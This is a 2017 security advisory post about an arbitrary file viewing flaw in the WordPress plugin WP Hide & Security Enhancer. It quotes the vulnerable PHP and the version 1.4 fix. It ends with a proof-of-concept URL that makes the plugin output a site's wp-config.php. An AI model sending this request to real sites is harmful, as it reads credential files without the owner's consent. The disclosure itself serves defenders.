Login
27 Feb 2017

Vulnerability Details: Arbitrary File Viewing Vulnerability in WP Hide & Security Enhancer

From time to time vulnerabilities are fixed in plugin without someone putting out a report on the vulnerability and we will put out a post detailing the vulnerability. While putting out the details of the vulnerability increases the chances of it being exploited, it also can help to identify vulnerabilities that haven’t been fully fixed (in some cases not fixed at all) and help to identify additional vulnerabilities in the plugin.

Recently an arbitrary file viewing vulnerability was fixed in the plugin WP Hide & Security Enhancer. That is mentioned in the changelog for version 1.4, “Fix: Allow only css files to be processed through the router to prevent other types from being displayed arbitrary.” There also was mention on that on the blog of SecuPress, but that was deleted for whatever reason, so the only reference we could find to that is here. Looking at the changes made in that version it isn’t hard to find where the vulnerability existed.

In version 1.3.9.2  the file /router/file-process.php outputs the contents of a file (with some possible changes to content made by the lines with preg_replace() in them):

65
66
67
68
69
70
71
72

$handle         = fopen($this->file_path, "r");
$file_data      = fread($handle, filesize($this->file_path));
fclose($handle);
 
$file_data  =   preg_replace('!/\*.*?\*/!s', '', $file_data);
$file_data  =   preg_replace("/(^[\r\n]*|[\r\n]+)[\s\t]*[\r\n]+/", "\n", $file_data);
 
echo $file_data;

There is no restriction on what file can be read.

6
7
8
9
10
11
12

$file_path  =   isset($_GET['file_path'])   ?   $_GET['file_path']  :   '';
 
if(empty($action)   ||  empty($file_path))
    die();
 
//append doc root to path 
$file_path  =   $_SERVER["DOCUMENT_ROOT"] .   $file_path;

So the contents of any file on the website can be read.

In version 1.4 a new check has been added to restrict what files can be viewed to only those with a “css” extension:

18
19
20
21

//allow only style files
$pathinfo   =   pathinfo($full_file_path);
if(!isset($pathinfo['extension'])   ||  strtolower($pathinfo['extension'])  !=  'css')
    die();

The file /router/file-process.php was then removed in version 1.4.2.

Proof of Concept

The following proof of concept will show the contents of the website’s wp-config.php file.

Make sure to replace “[path to WordPress]” with the location of WordPress:

http://[path to WordPress]/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php

No related posts.

Leave a Reply

Your email address will not be published.